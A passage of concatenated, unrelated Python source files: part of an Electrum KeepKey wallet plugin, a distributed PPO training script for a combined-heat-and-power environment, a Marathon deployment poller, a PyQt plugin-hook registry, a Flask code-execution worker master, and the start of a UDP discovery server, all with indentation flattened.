derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
DPPO_CHP.py
|
"""
"""
import tensorflow as tf
from tensorflow.contrib.distributions import Normal
import numpy as np
import matplotlib.pyplot as plt
import threading, queue
from CHP.CHP_MODEL import CHPEnv
import datetime
EP_MAX = 2500
EP_LEN = 300
N_WORKER = 4 # parallel workers
GAMMA = 0.9 # reward discount factor
A_LR = 0.000005 # learning rate for actor
C_LR = 0.00002 # learning rate for critic
MIN_BATCH_SIZE = 24 # minimum batch size for updating PPO
UPDATE_STEP = 5 # loop update operation n-steps
EPSILON = 0.2 # Clipped surrogate objective
ON_TRAIN = False
env = CHPEnv()
S_DIM = env.state_dim
A_DIM = env.action_dim
A_BOUND = env.action_bound[1]
class PPO(object):
def __init__(self):
self.sess = tf.Session()
self.tfs = tf.placeholder(tf.float32, [None, S_DIM], 'state')
# critic
w_init = tf.contrib.layers.xavier_initializer()
l_c = tf.layers.dense(self.tfs, 300, tf.nn.relu, kernel_initializer=w_init, name='lc')
l_c1 = tf.layers.dense(l_c, 100, tf.nn.relu, kernel_initializer=w_init, name='lc1')
self.v = tf.layers.dense(l_c1, 1, kernel_initializer=w_init, name='v') # state value
self.tfdc_r = tf.placeholder(tf.float32, [None, 1], 'discounted_r')
self.advantage = self.tfdc_r - self.v
self.closs = tf.reduce_mean(tf.square(self.advantage))
tf.summary.scalar('critic_loss', self.closs)
self.ctrain_op = tf.train.AdamOptimizer(C_LR).minimize(self.closs)
# actor
pi, pi_params = self._build_anet('pi', trainable=True)
oldpi, oldpi_params = self._build_anet('oldpi', trainable=True)
self.sample_op = tf.squeeze(pi.sample(1), axis=0) # choosing action
self.update_oldpi_op = [oldp.assign(p) for p, oldp in zip(pi_params, oldpi_params)]
self.tfa = tf.placeholder(tf.float32, [None, A_DIM], 'action')
self.tfadv = tf.placeholder(tf.float32, [None, 1], 'advantage')
# ratio = tf.exp(pi.log_prob(self.tfa) - oldpi.log_prob(self.tfa))
ratio = pi.prob(self.tfa) / (oldpi.prob(self.tfa) + 1e-5)
surr = ratio * self.tfadv # surrogate loss
self.aloss = -tf.reduce_mean(tf.minimum(
surr,
tf.clip_by_value(ratio, 1. - EPSILON, 1. + EPSILON) * self.tfadv))
tf.summary.scalar('actor_loss', self.aloss)
self.atrain_op = tf.train.AdamOptimizer(A_LR).minimize(self.aloss)
self.merged = tf.summary.merge_all()
self.sess.run(tf.global_variables_initializer())
def update(self):
global GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
if GLOBAL_EP < EP_MAX:
UPDATE_EVENT.wait() # wait until get batch of data
self.sess.run(self.update_oldpi_op) # old pi to pi
data = [QUEUE.get() for _ in range(QUEUE.qsize())]
data = np.vstack(data)
s, a, r = data[:, :S_DIM], data[:, S_DIM: S_DIM + A_DIM], data[:, -1:]
adv = self.sess.run(self.advantage, {self.tfs: s, self.tfdc_r: r})
[self.sess.run(self.atrain_op, {self.tfs: s, self.tfa: a, self.tfadv: adv}) for _ in range(UPDATE_STEP)]
[self.sess.run(self.ctrain_op, {self.tfs: s, self.tfdc_r: r}) for _ in range(UPDATE_STEP)]
UPDATE_EVENT.clear() # updating finished
GLOBAL_UPDATE_COUNTER = 0 # reset counter
ROLLING_EVENT.set() # set roll-out available
def _build_anet(self, name, trainable):
with tf.variable_scope(name):
l1 = tf.layers.dense(self.tfs, 300, tf.nn.relu, trainable=trainable)
l2 = tf.layers.dense(l1, 100, tf.nn.relu, trainable=trainable)
mu = A_BOUND * tf.layers.dense(l2, A_DIM, tf.nn.tanh, trainable=trainable)
sigma = tf.layers.dense(l2, A_DIM, tf.nn.softplus, trainable=trainable)
norm_dist = Normal(loc=mu, scale=sigma)
params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
return norm_dist, params
def choose_action(self, s):
s = s[np.newaxis, :]
a = self.sess.run(self.sample_op, {self.tfs: s})[0]
return np.clip(a, -1, 1)
def get_v(self, s):
if s.ndim < 2: s = s[np.newaxis, :]
return self.sess.run(self.v, {self.tfs: s})[0, 0]
def save(self):
saver = tf.train.Saver()
saver.save(self.sess, './params', write_meta_graph=False)
def restore(self):
saver = tf.train.Saver()
saver.restore(self.sess, './params')
class Worker(object):
def __init__(self, wid):
self.wid = wid
self.env = CHPEnv()
self.ppo = GLOBAL_PPO
def work(self):
global GLOBAL_EP, GLOBAL_RUNNING_R, GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
s = self.env.reset()
ep_r = 0
buffer_s, buffer_a, buffer_r = [], [], []
for t in range(EP_LEN):
if not ROLLING_EVENT.is_set(): # while global PPO is updating
ROLLING_EVENT.wait() # wait until PPO is updated
buffer_s, buffer_a, buffer_r = [], [], [] # clear history buffer
a = self.ppo.choose_action(s)
s_, r, done = self.env.step(a)
if t == EP_LEN - 1: done = True
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r/100) # normalize reward, find to be useful
s = s_
ep_r += r/100
GLOBAL_UPDATE_COUNTER += 1 # count to minimum batch size
if done or GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
v_s_ = self.ppo.get_v(s_)
discounted_r = [] # compute discounted reward
for r in buffer_r[::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer_s), np.vstack(buffer_a), np.array(discounted_r)[:, np.newaxis]
buffer_s, buffer_a, buffer_r = [], [], []
QUEUE.put(np.hstack((bs, ba, br)))
if GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
ROLLING_EVENT.clear() # stop collecting data
UPDATE_EVENT.set() # globalPPO update
if GLOBAL_EP >= EP_MAX: # stop training
COORD.request_stop()
break
# record reward changes, plot later
if len(GLOBAL_RUNNING_R) == 0:
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(GLOBAL_RUNNING_R[-1] * 0.9 + ep_r * 0.1)
GLOBAL_EP += 1
print('{0:.1f}%'.format(GLOBAL_EP / EP_MAX * 100), '|W%i' % self.wid, '|Ep_r: %.2f' % ep_r, )
if __name__ == '__main__':
GLOBAL_PPO = PPO()
if ON_TRAIN:
starttime = datetime.datetime.now()
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
UPDATE_EVENT.clear() # no update now
ROLLING_EVENT.set() # start to roll out
workers = [Worker(wid=i) for i in range(N_WORKER)]
GLOBAL_UPDATE_COUNTER, GLOBAL_EP = 0, 0
GLOBAL_RUNNING_R = []
COORD = tf.train.Coordinator()
QUEUE = queue.Queue()
threads = []
for worker in workers: # worker threads
t = threading.Thread(target=worker.work, args=())
t.start()
threads.append(t)
# add a PPO updating thread
threads.append(threading.Thread(target=GLOBAL_PPO.update, ))
threads[-1].start()
COORD.join(threads)
endtime = datetime.datetime.now()
print((endtime - starttime).seconds)
GLOBAL_PPO.save()
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
np.savetxt('R_dppo.txt', GLOBAL_RUNNING_R, delimiter=',')
plt.xlabel('Episode');
plt.ylabel('Moving reward');
plt.ion();
plt.show()
else:
GLOBAL_PPO.restore()
s = env.set()
print(env.device_info)
state = np.zeros((300, 14))
device = np.zeros((300, 4, 4))
dis_p = np.zeros(300)
dis_q = np.zeros(300)
cost = np.zeros(300)
for t in range(300):
env.render()
s = env.step(GLOBAL_PPO.choose_action(s))[0]
state[t, :] = s
cost[t] = env.realcost
print(env.device_info)
device[t, :, :] = env.device_info
cost[t] = env.realcost
np.save("state.npy", state)
np.save("device.npy", device)
np.save("cost.npy", cost)
|
marathonpoller.py
|
import requests
import json
import time
import threading
from .marathonevents import *
from performance.driver.core.classes import Observer
from performance.driver.core.events import TickEvent, TeardownEvent, StartEvent
from performance.driver.core.reflection import subscribesToHint, publishesHint
from performance.driver.core.utils import dictDiff
from performance.driver.core.eventfilters import EventFilter
from performance.driver.classes.channel.marathon import MarathonDeploymentStartedEvent
DIFF_REASON_REMOVED = 0
DIFF_REASON_CREATED = 1
DIFF_REASON_MODIFIED = 2
EMPTY_GROUP = {"id": "/", "apps": [], "groups": [], "pods": []}
class MarathonPollerObserver(Observer):
"""
The *Marathon Poller Observer* is a polling-based fallback observer that can
fully replace the ``MarathonEventsObserver`` when the SSE event bus is not
available.
::
observers:
- class: observer.MarathonPollerObserver
# The URL to the marathon base
url: "{{marathon_url}}"
# [Optional] Additional headers to send
headers:
Accept: test/plain
# [Optional] How long to wait between consecutive polls (seconds)
interval: 0.5
# [Optional] How long to wait before considering the deployment "Failed"
# If set to 0 the deployment will never fail.
failureTimeout: 0
# [Optional] How many times to re-try polling the endpoint before
# considering the connection closed
retries: 3
# [Optional] Event binding
events:
# [Optional] Which event to wait to start polling
start: StartEvent
# [Optional] Which event to wait to stop polling
stop: TeardownEvent
This observer is polling the ``/groups`` endpoint as fast as possible and it
calculates deferences from the previously observed state. Any differences are
propagated as virtual deployment events as:
* ``MarathonDeploymentSuccessEvent``
* ``MarathonDeploymentFailedEvent``
If requested, the poller is going to look for ``MarathonDeploymentStartedEvent``
events and is going to wait for it to be completed in a given time. If the time
is passed, a synthetic failure event will be generated:
* ``MarathonDeploymentFailedEvent``
.. note::
This observer will automatically inject an ``Authorization`` header if
a ``dcos_auth_token`` definition exists, so you don't have to specify
it through the ``headers`` configuration.
Note that a ``dcos_auth_token`` can be dynamically injected via an
authentication task.
"""
@subscribesToHint(MarathonDeploymentStartedEvent)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load config
config = self.getRenderedConfig()
self.url = config['url']
self.headers = config.get('headers', {})
self.pollInterval = config.get('interval', 0.5)
self.failureTimeout = config.get('failureTimeout', 0)
self.retries = config.get('retries', 3)
eventsConfig = config.get('events', {})
self.startEventSession = EventFilter(
eventsConfig.get('start', 'StartEvent')).start(None,
self.handleStartEvent)
self.stopEventSession = EventFilter(
eventsConfig.get('stop', 'TeardownEvent')).start(
None, self.handleStopEvent)
self.retriesLeft = self.retries
self.requestTraceIDs = {}
self.requestedDeployments = set()
self.requestedDeploymentTimeout = {}
self.pollDelta = 0
self.connected = False
self.lastGroup = {}
self.reset()
# Keep track of outgoing deployment requests
self.eventbus.subscribe(
self.handleRequest, events=(MarathonDeploymentStartedEvent, ))
self.eventbus.subscribe(self.handleEvent)
# Start thread
self.thread = None
self.active = False
def handleEvent(self, event):
"""
Pass down event to start/stop sessions
"""
self.startEventSession.handle(event)
self.stopEventSession.handle(event)
def handleStartEvent(self, event):
"""
Handle request to start polling
"""
if not self.thread is None:
return
# Start polling thread
self.active = True
self.thread = threading.Thread(target=self.pollerThread, name="marathonpoller-poller")
self.thread.start()
def handleStopEvent(self, event):
"""
Handle request to stop polling
"""
if self.thread is None:
return
# Stop polling thread
self.active = False
self.thread.join()
def pollerThread(self):
"""
The poller thread polls the marathon endpoint at fixed intervals
"""
while self.active:
self.pollGroupsEndpoint()
time.sleep(self.pollInterval)
def reset(self):
"""
Reset the local state
"""
self.retriesLeft = self.retries
self.connected = False
self.lastGroup = {"id": "/", "apps": [], "groups": [], "pods": []}
def cleanupInstanceDeployment(self, inst):
"""
Remove records associated to the given instance
"""
if inst in self.requestedDeployments:
self.requestedDeployments.remove(inst)
if inst in self.requestedDeploymentTimeout:
del self.requestedDeploymentTimeout[inst]
if inst in self.requestTraceIDs:
del self.requestTraceIDs[inst]
@publishesHint(MarathonDeploymentFailedEvent)
def failRequestedDeployment(self, inst, reason="due to timeout"):
"""
Fail the specified requested deployment
"""
self.logger.warn('Failing deployment {} {}'.format(inst, reason))
self.eventbus.publish(
MarathonDeploymentFailedEvent(
None, inst, traceid=self.requestTraceIDs.get(inst, None)))
self.cleanupInstanceDeployment(inst)
def failAllPendingRequests(self):
"""
Fail all the requested deployments
"""
# Copy this list in order to be able to iterate on it's items
# while removing items from `self.requestedDeployments`
immutableList = list(self.requestedDeployments)
for inst in immutableList:
self.failRequestedDeployment(inst, "due to connection interrupt")
def failExpiredPendingRequests(self):
"""
Fail all the requests that passed it's grace timeout
"""
ts = time.time()
expire_ids = []
for inst, timeout in self.requestedDeploymentTimeout.items():
if ts >= timeout:
expire_ids.append(inst)
for inst in expire_ids:
self.failRequestedDeployment(inst)
def handleRequest(self, event):
"""
Keep track of the requested deployments
"""
self.requestTraceIDs[event.instance] = event.traceids
self.requestedDeployments.add(event.instance)
# Set the deployment failure timeout
ts = time.time()
if self.failureTimeout > 0:
self.requestedDeploymentTimeout[
event.instance] = ts + self.failureTimeout
@publishesHint(MarathonStartedEvent, MarathonUnavailableEvent,
MarathonDeploymentSuccessEvent,
MarathonGroupChangeSuccessEvent)
def pollGroupsEndpoint(self):
"""
Poll the groups endpoint
"""
definitions = self.getDefinitions()
# If we are missing an `Authorization` header but we have a
# `dcos_auth_token` definition, allocate an `Authorization` header now
#
# Note: We are putting this within the loop because the `dcos_auth_token`
# might appear at a later time if an authentication task is already
# in progress.
#
headers = dict(self.headers)
if not 'Authorization' in headers \
and 'dcos_auth_token' in definitions:
headers['Authorization'] = 'token={}'.format(
definitions['dcos_auth_token'])
# Poll the endpoint
group = None
try:
url = '{}/v2/groups?embed=group.groups&embed=group.apps&embed=group.pods&embed=group.apps.deployments'.format(
self.url)
self.logger.debug('Requesting {}'.format(url))
res = requests.get(url, headers=headers, verify=False)
# Handle HTTP response
if res.status_code < 200 or res.status_code >= 300:
self.logger.warn(
'Unexpected HTTP response HTTP/{}'.format(res.status_code))
if self.connected:
self.logger.debug('We are connected, ignoring for {} more tries'.
format(self.retriesLeft))
self.retriesLeft -= 1
if self.retriesLeft > 0:
self.logger.debug('Not taking an action')
return # Don't take any action, wait for next tick
else:
self.retriesLeft = self.retries
self.logger.debug('Resetting retries to {}'.format(self.retriesLeft))
group = res.json()
except Exception as e:
self.logger.error(
'Unexpected exception {}: {}'.format(type(e).__name__, str(e)))
if self.connected:
self.logger.debug('We are connected, ignoring for {} more tries'.
format(self.retriesLeft))
self.retriesLeft -= 1
if self.retriesLeft > 0:
self.logger.debug('Not taking an action')
return # Don't take any action, wait for next tick
# Handle connected state toggle
if not self.connected and group:
self.logger.info('Marathon is responding')
self.connected = True
self.lastGroup = group
self.eventbus.publish(MarathonStartedEvent())
elif self.connected and not group:
self.logger.warn('Marathon became unresponsive')
self.failAllPendingRequests()
self.reset()
self.eventbus.publish(MarathonUnavailableEvent())
elif self.connected:
(diff_instances, diff_groups) = diffRootGroups(self.lastGroup, group)
self.lastGroup = group
# Create one virtual deployments for every affected instance
for inst in diff_instances:
self.eventbus.publish(
MarathonDeploymentSuccessEvent(
None, [inst], traceid=self.requestTraceIDs.get(inst, None)))
self.cleanupInstanceDeployment(inst)
# Create virtual group deployments
for grp in diff_groups:
self.eventbus.publish(
MarathonGroupChangeSuccessEvent(
None, grp, traceid=self.requestTraceIDs.get(grp, None)))
self.cleanupInstanceDeployment(grp)
# Fail expired requests
self.failExpiredPendingRequests()
def diffRootGroups(group_a, group_b):
"""
Calculate the differences in apps, pods and groups of the given two groups
"""
diff_instances = set()
diff_groups = set()
# Get app IDs from two groups
apps_a = {}
for app_a in group_a['apps']:
apps_a[app_a['id']] = app_a
apps_b = {}
for app_b in group_b['apps']:
apps_b[app_b['id']] = app_b
# Check for changes in apps
for iid in apps_a.keys():
if not iid in apps_b:
diff_instances.add(iid) # Removed
for iid in apps_b.keys():
if not iid in apps_a:
if len(apps_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
for iid, app_a in apps_a.items():
if iid in apps_b:
if dictDiff(app_a, apps_b[iid]):
if len(apps_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
# Get pod IDs from two groups
pods_a = {}
for pod_a in group_a['pods']:
pods_a[pod_a['id']] = pod_a
pods_b = {}
for pod_b in group_b['pods']:
pods_b[pod_b['id']] = pod_b
# Check for changes in pods
for iid in pods_a.keys():
if not iid in pods_b:
diff_instances.add(iid)
for iid in pods_b.keys():
if not iid in pods_a:
if len(pods_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
for iid, pod_a in pods_a.items():
if iid in pods_b:
if dictDiff(pod_a, pods_b[iid]):
if len(pods_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
# Get IDs from two groups
groups_a = {}
for group_a in group_a['groups']:
groups_a[group_a['id']] = group_a
groups_b = {}
for group_b in group_b['groups']:
groups_b[group_b['id']] = group_b
# Check for changes in pods
for gid in groups_a.keys():
if not gid in groups_b:
diff_groups.add(gid)
for gid in groups_b.keys():
if not gid in groups_a:
diff_groups.add(gid)
for gid, pgroup_a in groups_a.items():
if gid in groups_b:
if dictDiff(pgroup_a, groups_b[gid]):
diff_groups.add(gid)
# For every changed group, deep into details
base_groups_immutable = set(diff_groups)
for group in base_groups_immutable:
empty_group = {"id": group, "apps": [], "pods": [], "groups": []}
if group in groups_a:
if group in groups_b:
(child_diff_instances, child_diff_groups) = diffRootGroups(
groups_a[group], groups_b[group])
diff_instances.update(child_diff_instances)
diff_groups.update(child_diff_groups)
else:
(child_diff_instances, child_diff_groups) = diffRootGroups(
groups_a[group], empty_group)
diff_instances.update(child_diff_instances)
diff_groups.update(child_diff_groups)
else:
(child_diff_instances, child_diff_groups) = diffRootGroups(
empty_group, groups_b[group])
diff_instances.update(child_diff_instances)
diff_groups.update(child_diff_groups)
# Return instance and group diffs
return (diff_instances, diff_groups)
|
hplugins.py
|
import logging
import os
import uuid
import threading
import sys
from PyQt5.QtCore import pyqtWrapperType
log = logging.getLogger(__name__)
log_i = lambda a: None
log_d = lambda a: None
log_w = lambda a: None
log_e = lambda a: None
log_c = lambda a: None
class PluginError(ValueError):
pass
class PluginIDError(PluginError):
pass
class PluginNameError(PluginIDError):
pass
class PluginMethodError(PluginError):
pass
class Plugins:
""
_connections = []
_plugins = {}
_pluginsbyids = {}
hooks = {}
def register(self, plugin):
assert isinstance(plugin, HPluginMeta)
self.hooks[plugin.ID] = {}
self._plugins[plugin.NAME] = plugin() # TODO: name conflicts?
self._pluginsbyids[plugin.ID] = self._plugins[plugin.NAME]
def _connectHooks(self):
for plugin_name, pluginid, h_name, handler in self._connections:
log_i("{}:{} connection to {}:{}".format(plugin_name, handler, pluginid, h_name))
print(self.hooks)
try:
p = self.hooks[pluginid]
except KeyError:
log_e("Could not find plugin with plugin id: {}".format(pluginid))
return
try:
h = p[h_name]
except KeyError:
log_e("Could not find pluginhook with name: {}".format(h_name))
return
h.addHandler(handler, (plugin_name, pluginid))
return True
def __getattr__(self, key):
try:
return self._plugins[key]
except KeyError:
raise PluginNameError(key)
registered = Plugins()
class HPluginMeta(pyqtWrapperType):
def __init__(cls, name, bases, dct):
if not name.endswith("HPlugin"):
log_e("Main plugin class should end with name HPlugin")
return
if not hasattr(cls, "ID"):
log_e("ID attribute is missing")
return
cls.ID = cls.ID.replace('-', '')
if not hasattr(cls, "NAME"):
log_e("NAME attribute is missing")
return
if not hasattr(cls, "VERSION"):
log_e("VERSION attribute is missing")
return
if not hasattr(cls, "AUTHOR"):
log_e("AUTHOR attribute is missing")
return
if not hasattr(cls, "DESCRIPTION"):
log_e("DESCRIPTION attribute is missing")
return
try:
val = uuid.UUID(cls.ID, version=4)
assert val.hex == cls.ID
except ValueError:
log_e("Invalid plugin id. UUID4 is required.")
return
except AssertionError:
log_e("Invalid plugin id. A valid UUID4 is required.")
return
if not isinstance(cls.NAME, str):
log_e("Plugin name should be a string")
return
if not isinstance(cls.VERSION, tuple):
log_e("Plugin version should be a tuple with 3 integers")
return
if not isinstance(cls.AUTHOR, str):
log_e("Plugin author should be a string")
return
if not isinstance(cls.DESCRIPTION, str):
log_e("Plugin description should be a string")
return
super().__init__(name, bases, dct)
setattr(cls, "connectPlugin", cls.connectPlugin)
setattr(cls, "newHook", cls.createHook)
setattr(cls, "connectHook", cls.connectHook)
setattr(cls, "__getattr__", cls.__getattr__)
registered.register(cls)
def connectPlugin(cls, pluginid, plugin_name):
"""
Connect to other plugins
Params:
pluginid: PluginID of the plugin you want to connect to
plugin_name: Name you want to referrer the other plugin as
Other methods of other plugins can be used as such: self.plugin_name.method()
"""
class OtherHPlugin:
def __init__(self, pluginid):
self._id = pluginid.replace('-', '')
def __getattr__(self, key):
try:
plugin = registered._pluginsbyids[self._id]
pluginmethod = getattr(plugin, key, None)
if pluginmethod:
return pluginmethod
else:
raise PluginMethodError(key)
except KeyError:
raise PluginIDError(self._id)
setattr(cls, plugin_name, OtherHPlugin(pluginid))
def connectHook(self, pluginid, hook_name, handler):
"""
Connect to other plugins' hooks
Params:
pluginid: PluginID of the plugin that has the hook you want to connect to
hook_name: Exact name of the hook you want to connect to
handler: Your custom method that should be executed when the other plugin uses its hook.
"""
assert isinstance(pluginid, str) and isinstance(hook_name, str) and callable(handler), ""
registered._connections.append((self.NAME, pluginid.replace('-', ''), hook_name, handler))
def createHook(self, hook_name):
"""
Create hooks that other plugins can extend
Params:
hook_name: Name of the hook you want to create.
Hook will be used as such: self.hook_name()
"""
assert isinstance(hook_name, str), ""
class Hook:
_handlers = set()
def addHandler(self, handler, pluginfo):
self._handlers.add((handler, pluginfo))
def __call__(self, *args, **kwargs):
handler_returns = []
for handlers, pluginfo in self._handlers:
try:
handler_returns.append(handlers(*args, **kwargs))
except Exception as e:
raise PluginError("{}:{}".format(pluginfo[0], pluginfo[1]))
return handler_returns
h = Hook()
registered.hooks[self.ID][hook_name] = h
def __getattr__(self, key):
try:
return registered.hooks[self.ID][key]
except KeyError:
return PluginMethodError(key)
#def startConnectionLoop():
# def autoConnectHooks():
# run = True
# while run:
# run = registered._connectHooks()
# auto_t = threading.Thread(target=autoConnectHooks)
# auto_t.start()
|
master.py
|
import atexit
import logging
import multiprocessing
import queue
from collections import defaultdict, deque
from functools import lru_cache
from multiprocessing import Process, Queue
from threading import Thread, RLock
from time import sleep, time
import flask
import psutil
import sentry_sdk
from main import simple_settings
from main.simple_settings import MONITOR
from main.workers.utils import internal_error_result, make_result
from main.workers.worker import worker_loop_in_thread
TESTING = False
log = logging.getLogger(__name__)
class UserProcess:
def __init__(self):
self.user_id = None
self.lock = RLock()
self.task_queue = None
self.input_queue = None
self.result_queue = None
self.awaiting_input = False
self.process = None
self.fresh_process = True
self.last_used = float('inf')
self.start_process()
atexit.register(self.cleanup)
def cleanup(self, *, in_background=False):
process = self.process
queues = [self.task_queue, self.input_queue, self.result_queue]
if process is None:
assert not any(queues), (process, queues)
return
def do():
if process:
process.terminate()
for q in queues:
if q:
q.close()
if in_background:
Thread(target=do).start()
else:
do()
def close(self):
atexit.unregister(self.cleanup)
self.cleanup(in_background=True)
@property
def ps(self):
return psutil.Process(self.process.pid)
def start_process(self):
self.cleanup(in_background=True)
self.fresh_process = True
self.awaiting_input = False
self.task_queue = Queue()
self.input_queue = Queue()
self.result_queue = Queue()
self.process = Process(
target=worker_loop_in_thread,
args=(self.task_queue, self.input_queue, self.result_queue),
daemon=True,
)
self.process.start()
def handle_entry(self, entry):
self.last_used = time()
if entry["source"] == "shell":
if self.awaiting_input:
self.input_queue.put(entry["input"])
else:
self.task_queue.put(entry)
else:
if not TESTING and self.awaiting_input:
self.start_process()
self.task_queue.put(entry)
def await_result(self):
result = self._await_result()
if result["error"] and result["error"]["sentry_event"]:
sentry_sdk.capture_event(result["error"]["sentry_event"])
self.awaiting_input = result["awaiting_input"]
return result
def _await_result(self):
# TODO cancel if result was cancelled by a newer handle_entry
result = None
while result is None:
if simple_settings.Root.SET_LIMITS:
timeout = 10 if self.fresh_process else 3
else:
timeout = None
try:
result = self.result_queue.get(timeout=timeout)
assert (result is None) == self.fresh_process
self.fresh_process = False
except queue.Empty:
self.start_process()
result = make_result(
output_parts=[
dict(color='red', text='The process died.\n'),
dict(color='red', text='Your code probably took too long.\n'),
dict(color='red', text='Maybe you have an infinite loop?\n'),
],
output='The process died.',
)
return result
user_processes = defaultdict(UserProcess)
app = flask.Flask(__name__)
try:
multiprocessing.set_start_method("spawn")
except RuntimeError:
# noinspection PyArgumentList
assert multiprocessing.get_start_method() == "spawn"
def monitor_processes():
history = deque([], MONITOR.NUM_MEASUREMENTS)
while True:
sleep(MONITOR.SLEEP_TIME)
percent = psutil.virtual_memory().percent
history.append(percent)
log.info(f"Recent memory usage: {history}")
log.info(f"Number of user processes: {len(user_processes)}")
if (
len(history) == history.maxlen
and min(history) > MONITOR.THRESHOLD
and len(user_processes) > MONITOR.MIN_PROCESSES
):
oldest = min(user_processes.values(), key=lambda p: p.last_used)
log.info(f"Terminating process last used {int(time() - oldest.last_used)} seconds ago")
del user_processes[oldest.user_id]
with oldest.lock:
oldest.close()
history.clear()
@lru_cache()
def start_monitor():
if MONITOR.ACTIVE:
Thread(
target=monitor_processes,
name=monitor_processes.__name__,
daemon=True,
).start()
@app.route("/run", methods=["POST"])
def run():
start_monitor()
try:
entry = flask.request.json
user_id = entry["user_id"]
user_process = user_processes[user_id]
user_process.user_id = user_id
with user_process.lock:
user_process.handle_entry(entry)
return user_process.await_result()
except Exception:
return internal_error_result()
@app.route("/health")
def health():
return "ok"
def run_server():
app.run(host="0.0.0.0")
@lru_cache()
def master_session():
import requests
session = requests.Session()
if not simple_settings.Root.SEPARATE_WORKER_PROCESS:
Thread(
target=run_server,
daemon=True,
name=run_server.__name__,
).start()
# Wait until alive
while True:
try:
session.get(simple_settings.Root.MASTER_URL + "health")
break
except requests.exceptions.ConnectionError:
sleep(1)
return session
def worker_result(entry):
session = master_session()
return session.post(simple_settings.Root.MASTER_URL + "run", json=entry).json()
if __name__ == '__main__':
run_server()
|
main.py
|
#!/usr/bin/env python
#
# Author: Younis Bensalah <younis.bensalah@gmail.com>
#
import os
import sys
import logging
import threading
import argparse
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../common'))
from server import *
from socketserver import UDPServer, BaseRequestHandler
class UDPDiscoveryHandler(BaseRequestHandler):
